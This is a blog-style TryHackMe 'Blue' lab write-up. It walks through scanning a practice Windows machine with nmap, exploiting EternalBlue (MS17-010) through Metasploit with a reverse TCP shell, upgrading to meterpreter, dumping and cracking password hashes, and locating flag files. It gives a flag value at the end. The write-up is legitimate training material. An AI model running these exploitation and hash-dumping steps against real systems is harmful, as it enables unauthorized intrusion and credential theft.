Open in app

Sign in

Write

Sign in

THM Blue Write Up

Rithvik Reddy
4 min readAug 5, 2021

Background - Blue is a great machine to get to familiar with EternalBlue (CVE-2017–0144).

The room’s description says that it doesn’t respond to ping ICMP packets but if we try to ping,

it works and we get reply back. Since it’s a Windows box weird things happen.

Reconnaissance

Lets follow the traditional method, Lets scan the machine.

Type this command -

nmap -sV -sC -A machinesip

What does this command do?

  • -sV : This flag used to enumerate versions.
  • -sC : Performs a script scan using the default set of scripts. It is equivalent to --script=default
  • -A : This flag is used to Enable OS detection, script scanning and version detection.

We got this

Ok we saw that there are 3 ports are open with a port number under 1000.

What is the machine vulnerable to?

Hint : -

After googling I found this, it is
ms17_010_eternalblue

Access

To gain access to the machine we run metasploit, to start the metasploit type

msfconsole

The exploitation code which we will run against the machine is exploit/windows/smb/ms17_010_eternalblue.

Now we will use this exploit by entering the command

use exploit/windows/smb/ms17_010_eternalblue

and we type show options to set the required values.

RHOSTS is the required value

Now lets exploit the machine, for this we just need to set the payload, RHOST, LHOST.

Type

set payload windows/x64/shell/reverse_tcp set RHOST machine ipset LHOST your machine ip

Ok now we are good to go. just type exploit or run to exploit the machine

Yay, we successfully exploited the machine.

Escalate

Lets start escalating the privileges, for this lets background this session by ctrl+Z. Lets convert a shell to meterpreter shell in metasploit.

Type

use post/multi/manage/shell_to_meterpretershow options

Now we can see that SESSION is the required option to set. For this, type sessions -l to see how many sessions are opened.

Now we need to set the session id and exploit. For this just type

set SESSION 1

and run it. Now we successfully completed the post module execution.

Cracking

Within our elevated meterpreter shell, run the command ‘hashdump’. This will dump all of the hashes on the machine as long as we have the correct privileges to do so.

hashdump

The name of the non default user is Jon.

Now copy this

and crack it online.

yay, we got credientials.

Here comes the main part {FLAGS}

For flags just type shell in meterpreter.

Now you should search for the flags. For this just change your directory to

C:\ . Then type this command to search the files containing flags.

dir *flag*.txt /s

Yay, we found the flags, now just cat this file.

15ae4d7b4081407aa462768c5056c6e0

Thanks for scrolling down.

Rithvik Reddy.

--

--

Rithvik Reddy

Written by Rithvik Reddy

14 Followers

Leave me here.

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams